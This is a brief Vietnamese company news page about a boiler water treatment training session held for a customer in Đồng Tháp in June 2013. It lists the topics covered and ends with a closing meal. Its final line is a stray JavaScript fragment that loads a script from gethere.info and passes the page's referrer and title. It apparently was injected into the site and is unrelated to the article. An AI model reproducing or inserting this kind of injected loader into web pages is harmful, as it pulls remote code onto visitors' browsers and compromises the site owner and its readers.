Sun,24-06-2018

VIỆT THẮNG - 07.06.2013

Ngày 07.06.2013 Công ty Long Trường Vũ đã thực hiện thành công buổi training về kỹ thuật xử lý nước lò hơi tại Khách hàng Việt Thắng - Sa Đec - Đồng Tháp.

 

Các vấn đề thường gặp và  giải pháp

 

Các điểm kiểm soát và phương pháp kiểm soát

 

Nhân sự tham gia

 

Thảo luận

 

Hướng dẫn vận hành hệ thống tiền xử lý

 

Bữa cơm thân mật sau đào tạo

 

s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';